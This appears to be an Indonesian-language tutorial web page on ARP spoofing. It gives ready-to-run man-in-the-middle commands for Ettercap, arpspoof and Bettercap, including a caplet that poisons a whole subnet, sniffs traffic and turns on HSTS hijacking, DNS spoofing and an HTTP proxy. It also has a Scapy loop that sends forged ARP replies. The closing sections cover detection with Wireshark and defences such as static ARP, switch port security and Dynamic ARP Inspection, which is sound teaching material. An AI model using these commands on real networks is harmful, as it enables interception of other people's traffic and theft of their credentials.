Lewati ke konten utama

ARP Spoofing

a. Menggunakan Ettercap

Instalasi Ettercap:

sudo apt update && sudo apt install ettercap-text-only

Menjalankan Ettercap dalam mode teks:

sudo ettercap -Tq -M arp:remote /192.168.1.1// /192.168.1.100//
  • -Tq : Mode teks, tanpa GUI
  • -M arp:remote : Mode MITM menggunakan ARP Spoofing
  • /192.168.1.1// /192.168.1.100// : Menargetkan gateway dan korban

Menggunakan Wireshark untuk Mendeteksi ARP Spoofing

  1. Buka Wireshark dan pilih interface jaringan yang digunakan.
  2. Gunakan filter berikut untuk melihat paket ARP yang mencurigakan: 
    arp.opcode == 2
  3. Jika ada banyak ARP reply dari IP yang sama dengan MAC yang berbeda, kemungkinan terjadi ARP Spoofing.

b. Menggunakan Arpspoof

Instalasi Arpspoof:

sudo apt install dsniff

Menjalankan Arpspoof untuk menyerang target:

sudo arpspoof -i eth0 -t [target] [gateway]
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

sudo arpspoof -i eth0 -t [gateway] [target]
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
  • -i eth0 : Interface jaringan yang digunakan
  • -t 192.168.1.100 : Alamat IP korban
  • 192.168.1.1 : Alamat IP gateway

mengaktifkan port forwarding

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

c. Menggunakan Bettercap

Instalasi Bettercap

sudo apt update && sudo apt install bettercap -y

Menjalankan Bettercap

sudo bettercap -iface eth0

Setelah masuk ke CLI Bettercap, jalankan perintah berikut:

help                           # Menampilkan opsi bantuan yang tersedia di Bettercap
net.show                       # Menampilkan daftar perangkat yang terdeteksi dalam jaringan
net.probe on                   # Mengaktifkan pemindaian jaringan untuk mendeteksi perangkat secara aktif
net.sniff on                   # Mengaktifkan sniffing paket untuk menganalisis lalu lintas jaringan

set arp.spoof.targets 192.168.1.100  # Menentukan target untuk melakukan ARP Spoofing
arp.spoof on                   # Memulai serangan ARP Spoofing untuk meracuni cache ARP target
set net.sniff.filter tcp or udp # Menentukan filter sniffing untuk menangkap paket TCP atau UDP

hstshijack/hstshijack on        # Mengaktifkan HSTS Hijacking untuk menyusupi koneksi HTTPS

Menggunakan File Caplet untuk Automasi

Untuk mempercepat eksekusi perintah, gunakan file caplet:

cat > aria.cap << EOF
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 172.16.0.0/24
arp.spoof on
net.sniff on

set net.sniff.verbose true
set net.sniff.filter tcp or udp

hstshijack/hstshijack on
EOF

Jalankan Bettercap dengan caplet tersebut:

sudo bettercap -iface eth0 -caplet aria.cap

Caplet ini akan mengaktifkan pemindaian jaringan, menjalankan ARP Spoofing dalam mode full-duplex, dan mengaktifkan sniffing jaringan secara otomatis.

Opsi Lainnya

Selain contoh di atas, berikut beberapa opsi lain yang bisa dicoba:

  1. Menampilkan Informasi Lebih Detail:

    net.recon on         # Mengaktifkan mode pengintaian lanjutan
    net.show verbose     # Menampilkan detail perangkat secara lengkap

  2. Menyerang Banyak Target Sekaligus:

    set arp.spoof.targets 192.168.1.0/24  # Menargetkan seluruh subnet
    arp.spoof on

  3. Menjalankan Modul Lainnya:

    dns.spoof on         # Melakukan DNS Spoofing
    http.proxy on        # Menjalankan proxy HTTP untuk manipulasi trafik

Opsi-opsi ini dapat dikombinasikan dalam file caplet untuk memperluas fungsionalitas Bettercap sesuai kebutuhan Anda.

3. Tools yang Digunakan untuk ARP Spoofing

ToolDeskripsi
EttercapTools untuk MITM attack dengan ARP Spoofing.
WiresharkDigunakan untuk menganalisis paket jaringan dan mendeteksi ARP Spoofing.
ArpspoofTools sederhana untuk mengirim paket ARP palsu.
BettercapFramework security testing yang lebih canggih untuk MITM attack.
ScapyLibrary Python untuk membuat dan mengirim paket ARP palsu.

Contoh penggunaan Scapy untuk mengirim paket ARP palsu:

from scapy.all import *
arp_response = ARP(op=2, psrc='192.168.1.1', hwsrc='aa:bb:cc:dd:ee:ff', pdst='192.168.1.100')
send(arp_response, loop=1, inter=2)

4. Pencegahan ARP Spoofing

Static ARP

Menambahkan entri ARP statis untuk menghindari pembaruan palsu:

arp -s 192.168.1.1 00:11:22:33:44:55

Port Security di Switch

Menggunakan port security untuk membatasi jumlah MAC address yang dapat terhubung ke port tertentu:

switch# configure terminal
switch(config)# interface fa0/1
switch(config-if)# switchport mode access
switch(config-if)# switchport port-security
switch(config-if)# switchport port-security maximum 1
switch(config-if)# switchport port-security violation restrict
switch(config-if)# exit

Dynamic ARP Inspection (DAI)

Mengaktifkan inspeksi ARP pada switch untuk memverifikasi ARP yang sah:

switch# configure terminal
switch(config)# ip arp inspection vlan 10
switch(config)# interface fa0/1
switch(config-if)# ip arp inspection trust
switch(config-if)# exit

Kesimpulan

ARP Spoofing adalah teknik serangan yang dapat digunakan untuk melakukan MITM attack, mencuri data, atau memutus koneksi jaringan. Dengan alat seperti Ettercap, Arpspoof, Bettercap, dan Scapy, serangan ini dapat dilakukan dengan mudah. Namun, ada beberapa metode pencegahan yang dapat digunakan seperti static ARP, port security, dan Dynamic ARP Inspection untuk mengamankan jaringan dari serangan ini.